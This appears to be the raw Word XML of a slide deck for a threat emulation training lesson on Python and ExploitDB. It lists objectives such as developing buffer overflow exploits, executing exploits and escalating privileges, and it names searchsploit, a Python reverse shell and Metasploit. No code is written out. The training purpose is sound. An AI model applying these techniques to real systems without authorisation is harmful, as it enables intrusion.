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header9.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer9.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.foot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footer10.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer11.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header12.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer12.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.foot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footer13.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer14.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header15.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer15.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.foot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footer16.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer17.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header18.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer18.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header19.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/header20.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer19.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer20.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header21.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer21.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header22.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/header23.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer22.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer23.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/header24.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer2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6910C0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="4695"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="641DAC18" wp14:editId="615FF081">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>944880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>160020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="11247120" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340709" name="Picture 34070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709" name="Picture 340709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1247120" cy="3238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0" wp14:anchorId="389A7242" wp14:editId="181E2F50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3886200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340711" name="Picture 3407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711" name="Picture 340711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219200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82"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="82"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>ython</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B49608" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Course Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC632E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="349" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>After completing this course, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5D757" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Summarize the CTE squad's responsibilities, objectives, and deliverables from each CPT stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274319B8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Analyze threat information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E7E03" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Develop a Threat Emulation Plan (TEP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C750E94" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Generate mitigative and preemptive recommendations for local defenders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD4DA3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Develop mission reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46582215" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>onduct participative operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E205E7D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Conduct reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD5B999" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analyze network logs for offensive and defensive measures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5909C1AA" wp14:editId="66577A09">
            <wp:extent cx="2133600" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340714" name="Picture 3407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714" name="Picture 340714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133600" cy="1036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3E1AC4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Course Objectives (Continued)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95B888" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="373" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Students will also be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4FF77" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Analyze network traffic and tunneling protocols for offensive and defensive measu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D594BB3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Plan non-participative operations using commonly used tools, techniques and procedures (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B9F934" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="314"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Module 2: Threat Emulation (Objectives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A1E4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Conduct reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558944B7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Generate mission reports from non-participative operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E0B08" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Plan a non-participative operation using social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199F09F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Plan a non-participative operation using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0DEDF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Analyze network logs for offensive and defensive measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11630C6C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Analyze network traffic and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunneling protocols for offensive and defensive measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE04502" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Plan a non-participative operation using Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C412EC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Develop fuzzing scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216E696" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Develop buffer overflow exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F19EF5" wp14:editId="046C083B">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3435" name="Picture 343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35" name="Picture 3435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409700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98F642" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="164"/>
      </w:pPr>
      <w:r>
        <w:t>Module 2 — Lesson 12: Python and ExploitDB Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2C4639" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="63" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Interpret exploit code and Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve"> modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EE97A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="83" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Execute exploit on target machine with Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FAEF5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Perform privilege escalation on target with Python</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507CB57" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="32"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Refresher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57109674" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve">Yesterday, the main takeaways were: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F847023" wp14:editId="56CECB1A">
            <wp:extent cx="83820" cy="83820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8234" name="Picture 823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34" name="Picture 8234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83820" cy="83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50"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python urllib/requests Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3268D5C7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="74" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="56527CDC" wp14:editId="358CEAA6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8500" cy="5593081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8287" name="Picture 828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87" name="Picture 8287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559308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2"/>
        </w:rPr>
        <w:t>Python re/BeautifulSoup Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE13DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="549" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Python base64 Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD5763" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Exercise to practice with each of those libraries and find vulnerabilities in a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE30BA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C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pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1401" w:right="1596" w:bottom="180" w:left="1485" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA03F83" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="1222" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B16CD2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="193"/>
        <w:ind w:left="286" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Lesson Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A85ACE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="51"/>
        <w:ind w:left="298" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>In this lesson we will discuss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B05240" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>ExploitDB introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150362E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="179"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B6B7F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="72"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="58"/>
        </w:rPr>
        <w:t>Python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97D522" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>Exploitation, callback &amp; privilege escalation exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD845B5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="136"/>
        <w:ind w:left="301" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>Returning to the Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F6E7C0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="152" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfconsole provides a rudimentary way to search for exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C259708" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="273" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This is command-line based, and limited to only Metasploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FBF22" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="2131" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>= [ metasploit v4. 16.60-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F46228" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="2941" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>1771 exploits - 1010 auxiliary - 307 post</w:t>
      </w:r>
